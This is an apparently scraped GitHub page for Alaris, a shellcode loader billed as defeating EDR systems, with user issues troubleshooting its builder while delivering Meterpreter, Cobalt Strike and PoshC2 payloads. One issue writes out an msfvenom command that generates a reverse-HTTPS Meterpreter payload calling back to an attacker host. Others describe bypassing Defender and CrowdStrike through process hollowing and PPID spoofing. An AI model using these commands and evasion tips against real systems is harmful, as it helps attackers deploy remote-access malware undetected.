joshfaust / alaris

874.0 23.0 139.0 1.25 MB

A protective and Low Level Shellcode Loader that defeats modern EDR systems.

Home Page: https://sevrosecurity.com/2020/10/14/alaris-a-protective-loader/

License: Apache License 2.0

Languages: C++ 14.78%, C 55.05%, Assembly 17.10%, YARA 0.73%, Python 12.35%
Topics: shellcode-loader, syscalls, bypass-antivirus

alaris's People

Contributors

joshfaust

alaris's Issues

Meterpreter shellcode failing to generate an EXE

Hey

I love the tool's idea so I tried it out on some msf shellcode. It errors out on reading the file. Here is a log.

┌──(user㉿DESKTOP-O0R9DEO)-[/opt/Alaris]
└─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.xx.xx LPORT=4422 -f raw -o ~/Desktop/met64.raw
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 601 bytes
Saved as: /home/user/Desktop/met64.raw

┌──(user㉿DESKTOP-O0R9DEO)-[/opt/Alaris]
└─$ python3 builder.py -s ~/Desktop/met64.raw -p testing -o ~/Desktop/alaris.exe
[i] Key, IV Generation: Successful
[+] Key: 2a8d8dde386617fa549e7e5cba45b3725236b8203ede5ffca0bbf4584180f551
[+] IV: e9279e986c717652078521d2c21a6a17
[+] Salt: 0377a67814b64877851d6be6bf52b6cd
Traceback (most recent call last):
File "/opt/Alaris/builder.py", line 203, in <module>
raw_shellcode = parse_shellcode(args.sc_file)
File "/opt/Alaris/builder.py", line 155, in parse_shellcode
if "octet-stream" not in file_type:
TypeError: argument of type 'NoneType' is not iterable

┌──(switchblade㉿DESKTOP-O0R9DEO)-[/opt/Alaris]
└─$ python3 builder.py -s /home/user/Desktop/met64.raw -p testing -o ~/Desktop/alaris.exe
[i] Key, IV Generation: Successful
[+] Key: 5d19eafe276a62de5548de7a3d0fed6d289ef86b8dfda8f54ab32eb5d650a3a3
[+] IV: 4fef5b6eb94226d182eff2a21c6197f4
[+] Salt: aab0a888d04f10403f332a89e102e21e
Traceback (most recent call last):
File "/opt/Alaris/builder.py", line 203, in <module>
raw_shellcode = parse_shellcode(args.sc_file)
File "/opt/Alaris/builder.py", line 155, in parse_shellcode
if "octet-stream" not in file_type:
TypeError: argument of type 'NoneType' is not iterable

Additionally, on some shellcode it doesn't read it as binary at all.

┌──(user㉿DESKTOP-O0R9DEO)-[/opt/Alaris]
└─$ python3 builder.py -s /var/www/html/shell.txt -p testing
[i] Key, IV Generation: Successful
[+] Key: 4d544a6e86e2f7e2af1f7c16cf7e2ee72156e381a3a2fef88779d4188709c07c
[+] IV: 0f6c9f43f0a3669860336e4afbb2821e
[+] Salt: a696dad713faa958bd4b0d29a4e82190
[!] ERROR: /var/www/html/shell.txt does not look to be a RAW Binary file

┌──(user㉿DESKTOP-O0R9DEO)-[/opt/Alaris]
└─$ cat /var/www/html/shell.txt
(raw shellcode bytes printed to the terminal; omitted)

Hollowing detected by Crowdstrike

Heads up here, Crowdstrike gave a medium risk flag with "Defense Evasion via Process Hollowing". However, it seems that simply by using a different hollow_bin it can still be bypassed. Did they really set the detection rule against mobsync.exe :D
By the way, amazing tool; almost nothing worked out of the box for Defender bypass using a meterpreter payload, but Alaris did.

Compile Error: b''

Getting the below error on Win10 x64 with latest Python 3.9.2:

python builder.py -s c:\temp\shellcode.bin -p {redacted} -o c:\temp\shellcode.exe
[i] Key, IV Generation: Successful
 [+] Key: 76a4bdc4d17ef05116bd8c122841aef093e75eb701ff68628ceece84ce37e547
 [+] IV: 871b56e90419ec41c0e01fd6bd93a589
 [+] Salt: b35a686992959641a2668b9d731c567d
[i] Encrypt Shellcode: Successful
[i] Variable Swap: Successful
Compile Error: b''

Process 'MobSync.exe' always suspended

Hi, first of all, great work. The idea of using direct calls and encrypted shellcode along with process hollowing and PPID spoofing is really cool. However, I am facing a few issues. I compiled a fresh copy of the solution on a VM and generated the two exes. However, I can't get the loader to connect to the listener on localhost. The mobsync.exe process stays suspended.
I am also getting a couple of warnings. I've attached a couple of screenshots. Can you identify what I'm doing wrong?
[Screenshot 1: No connects :(]

[Screenshot 2: The warnings]

[Screenshot 3: OS and machine info]

Can't work

C:\Users\Alex\Desktop\cs\CS4.4\scripts\Alaris-master>python builder.py -s C:\Users\Alex\Desktop\payload.bin -p 123
[i] Key, IV Generation: Successful
 [+] Key: b5baa2742df5cb7a580f86de7faaa0de8d87308ef7b44cc2e82e7f7f12e88d50
 [+] IV: 89e5a34c6ca962e0d05557987f125220
 [+] Salt: 7cda6b1a1823e0d7094d03c0620cad78
[Errno 22] Invalid argument: 'C:\Users\Alex\Desktop\payload.bin'
[!] ERROR: Shellcode not in binary (bin,raw) format

Build Error

First, thanks for such a great loader. I have an issue when I try to build the loader; I get this error... any idea?

Severity: Error
Code: LNK1181
Description: cannot open input file 'x64\Release\loader.res'
Project: loader
File: C:\Users***\Desktop\loader\loader\LINK
Line: 1
Suppression State: (none)

Larger Shellcode Question

Any tips for using larger shellcode? Hitting line length limit. Thought about loading the shellcode over http or unc.

Executable runs and mobsync crashes

Hi @cribdragg3r, thank you for your great tool (encryption, process hollowing + PPID, syswhisper2...). Good ideas and such great work.
However, I am facing this issue after using PoshC2 (v7.4.0) and generating the exe from the build_patch branch after reading (#7): it crashes 2 seconds after executing the generated exe (same with svchost).
I tried all generated binaries with shellcode under 43 KB, e.g. "PBind_v4_Donut_x86_Shellcode, Posh_v2_Donut_x64_Shellcode, Sharp_v4_Donut_x64_Shellcode, PBindSharp_v4_Donut_x64_Shellcode". Can you identify what I'm doing wrong?

Event Name: BEX64
Response: Not available
Cab Id: 0

Problem signature:
P1: mobsync.exe
P2: 10.0.19041.1
P3: b01b5661
P4: StackHash_a011
P5: 0.0.0.0
P6: 00000000
P7: PCH_C1_FROM_unknown+0x0000000000000000
P8: c0000005
P9: 0000000000000008

Executable runs and the process dies shortly after, no beacon / shell

Since the max shellcode size update (thank you for this, really looking forward to the tool), Alaris will build the payload (following your exact Cobalt Strike steps to generate the SC), but the executable doesn't result in a beacon. All other payloads from CS work fine, so my setup is OK. Ideas? Watching the process in Task Manager shows it run for about 10 seconds and close; no endpoint security.

Keep Getting Crypto error

Keep getting "ModuleNotFoundError: No module named 'Crypto'" even though I have cryptodome installed. What am I doing wrong here?
